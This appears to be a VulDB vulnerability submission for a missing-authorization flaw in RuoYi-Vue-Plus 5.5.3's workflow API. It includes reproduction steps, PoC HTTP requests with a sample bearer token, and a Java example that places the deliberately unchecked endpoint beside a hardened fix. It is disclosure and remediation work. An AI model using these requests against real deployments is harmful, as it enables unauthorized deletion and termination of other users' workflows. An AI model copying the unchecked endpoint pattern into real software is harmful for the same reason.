Submission #753321: Dromara RuoYi-Vue-Plus 5.5.3 Privilege Escalation Info

Title: Dromara RuoYi-Vue-Plus 5.5.3 Privilege Escalation
Description: Dromara RuoYi-Vue-Plus v5.5.3 is vulnerable to Privilege Escalation in the Workflow module. The application fails to properly enforce object-level and function-level authorization checks on critical interfaces. Authenticated users with low privileges can bypass access controls to execute sensitive operations, such as deleting process instances, terminating tasks, and modifying task assignees, by directly invoking the API endpoints (e.g., /workflow/instance/deleteByInstanceIds). This issue stems from missing @SaCheckPermission annotations in FlwDefinitionController, FlwTaskController, and FlwInstanceController.

Vulnerability Type: CWE-862: Missing Authorization

Code: https://gitee.com/dromara/RuoYi-Vue-Plus
http://github.com/dromara/RuoYi-Vue-Plus

Analysis: The SaServletFilter in SecurityConfig.java only verifies login status but does not enforce specific permissions for the Workflow module. Critical controllers (FlwDefinitionController, FlwTaskController, FlwInstanceController) lack the @SaCheckPermission annotation on sensitive write operations.

Reproduction Steps:
1. Log in as a low-privileged user (no workflow admin rights) and obtain an authorization token.
2. Send a DELETE request to /workflow/instance/deleteByInstanceIds/ with the ID of a process instance created by an administrator.
3. The server responds with 200 OK, and the target instance is deleted, confirming the privilege escalation.

PoC (HTTP Request):
GET /workflow/definition/list?pageNum=1&pageSize=10 HTTP/1.1
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJsb2dpblR5cGUiOiJsb2dpbiIsImxvZ2luSWQiOiJzeXNfdXNlcjo0Iiwicm5TdHIiOiJ2TVpVY2ZiYXlVM3g0THF4SVk3N2REUG5Xb244N0EyWCIsImNsaWVudGlkIjoiZTVjZDdlNDg5MWJmOTVkMWQxOTIwNmNlMjRhN2IzMmUiLCJ0ZW5hbnRJZCI6IjAwMDAwMCIsInVzZXJJZCI6NCwidXNlck5hbWUiOiJ0ZXN0MSIsImRlcHRJZCI6MTAyLCJkZXB0TmFtZSI6IumVv-aymeWIhuWFrOWPuCIsImRlcHRDYXRlZ29yeSI6IiJ9.OUatQncTnbJHil5EqkbXgYRpj2PFjG02gkDxOdDHsNM
Connection: keep-alive
Content-Language: zh_CN
Cookie: PUBLICCMS_ANALYTICS_ID=db35d5f9-5a97-4e31-9f4b-e4d65d94cb13; PUBLICCMS_ADMIN=1_967744fc-9de7-4e7e-a32c-78e26cca27bb
Host: localhost:8080
Referer: http://localhost/demo/tree
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
clientid: e5cd7e4891bf95d1d19206ce24a7b32e
sec-ch-ua: "Not(A:Brand";v="8", "Chromium";v="144", "Google Chrome";v="144"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"

POST /workflow/task/terminationTask HTTP/1.1
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJsb2dpblR5cGUiOiJsb2dpbiIsImxvZ2luSWQiOiJzeXNfdXNlcjo0Iiwicm5TdHIiOiJ2TVpVY2ZiYXlVM3g0THF4SVk3N2REUG5Xb244N0EyWCIsImNsaWVudGlkIjoiZTVjZDdlNDg5MWJmOTVkMWQxOTIwNmNlMjRhN2IzMmUiLCJ0ZW5hbnRJZCI6IjAwMDAwMCIsInVzZXJJZCI6NCwidXNlck5hbWUiOiJ0ZXN0MSIsImRlcHRJZCI6MTAyLCJkZXB0TmFtZSI6IumVv-aymeWIhuWFrOWPuCIsImRlcHRDYXRlZ29yeSI6IiJ9.OUatQncTnbJHil5EqkbXgYRpj2PFjG02gkDxOdDHsNM
Connection: keep-alive
Content-Language: zh_CN
Cookie: PUBLICCMS_ANALYTICS_ID=db35d5f9-5a97-4e31-9f4b-e4d65d94cb13; PUBLICCMS_ADMIN=1_967744fc-9de7-4e7e-a32c-78e26cca27bb
Host: localhost:8080
Referer: http://localhost/demo/tree
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
clientid: e5cd7e4891bf95d1d19206ce24a7b32e
sec-ch-ua: "Not(A:Brand";v="8", "Chromium";v="144", "Google Chrome";v="144"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Content-Type: application/json

{"taskId":1,"comment":"poc"}
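The report's analysis is that a login-only SaServletFilter plus controllers without @SaCheckPermission leaves write endpoints open to any authenticated user. The following is an added example, not code from RuoYi-Vue-Plus or Sa-Token, showing a controller method in that vulnerable shape beside a hardened form that adds both a function-level check (Sa-Token's @SaCheckPermission annotation) and an object-level ownership check. The permission key "workflow:instance:remove", the role name "workflow_admin", and the InstanceService interface are hypothetical names chosen for this example.

```java
// Added example (not RuoYi-Vue-Plus or Sa-Token project code).
// Assumes Sa-Token (cn.dev33.satoken) and Spring Web are on the classpath.
// "workflow:instance:remove", "workflow_admin" and InstanceService are hypothetical.
package example.workflow;

import cn.dev33.satoken.annotation.SaCheckPermission;
import cn.dev33.satoken.stp.StpUtil;
import java.util.List;
import java.util.Map;
import org.springframework.http.HttpStatus;
import org.springframework.http.ResponseEntity;
import org.springframework.web.bind.annotation.DeleteMapping;
import org.springframework.web.bind.annotation.PathVariable;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RestController;

@RestController
@RequestMapping("/workflow/instance")
public class FlwInstanceControllerExample {

    private final InstanceService instanceService;

    public FlwInstanceControllerExample(InstanceService instanceService) {
        this.instanceService = instanceService;
    }

    // BEFORE (the CWE-862 shape the report describes): the global filter only
    // verifies that the caller is logged in, so every authenticated user who
    // reaches this method can delete any instance. No permission check, no
    // ownership check, and the server answers 200 OK.
    @DeleteMapping("/unsafe/deleteByInstanceIds/{instanceIds}")
    public ResponseEntity<Void> deleteUnsafe(@PathVariable List<Long> instanceIds) {
        instanceService.deleteByIds(instanceIds);
        return ResponseEntity.ok().build();
    }

    // AFTER: function-level check via the annotation, object-level check in the body.
    // @SaCheckPermission makes Sa-Token throw NotPermissionException before the body
    // runs when the login user lacks the permission; the application's exception
    // handler turns that into a denial instead of 200 OK.
    @SaCheckPermission("workflow:instance:remove")
    @DeleteMapping("/deleteByInstanceIds/{instanceIds}")
    public ResponseEntity<Void> deleteByInstanceIds(@PathVariable List<Long> instanceIds) {
        long callerId = StpUtil.getLoginIdAsLong();
        boolean isAdmin = StpUtil.hasRole("workflow_admin"); // hypothetical role name

        // Object-level authorization: a non-admin may only delete instances they own.
        Map<Long, Long> ownerByInstance = instanceService.findOwnerIds(instanceIds);
        for (Long id : instanceIds) {
            Long ownerId = ownerByInstance.get(id);
            // Unknown IDs are denied as well, so the response does not reveal
            // whether a foreign instance exists.
            if (ownerId == null || (!isAdmin && ownerId.longValue() != callerId)) {
                return ResponseEntity.status(HttpStatus.FORBIDDEN).build();
            }
        }
        instanceService.deleteByIds(instanceIds);
        return ResponseEntity.ok().build();
    }

    /** Minimal service contract assumed by this example (hypothetical). */
    public interface InstanceService {
        void deleteByIds(List<Long> instanceIds);
        /** Returns instanceId -> owner userId for the IDs that exist. */
        Map<Long, Long> findOwnerIds(List<Long> instanceIds);
    }
}
```

Two points worth checking when applying this pattern: Sa-Token enforces its annotations only if SaInterceptor (or the Sa-Token AOP plugin) is registered, so an annotation added to a controller that is not covered by the interceptor changes nothing; and the annotation alone fixes only the function-level gap, since a user who legitimately holds the permission could still name another user's instance ID without the ownership check in the body.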
User: feng123123 (UID 95215)
Submitted: 2026-02-06 10:30 (4 months ago)
Moderation: 2026-02-19 18:13 (13 days later)
Status: Accepted
VulDB Entry: 346944 [Dromara RuoYi-Vue-Plus up to 5.5.3 Workflow deleteByInstanceIds SaServletFilter privilege escalation]
Points: 17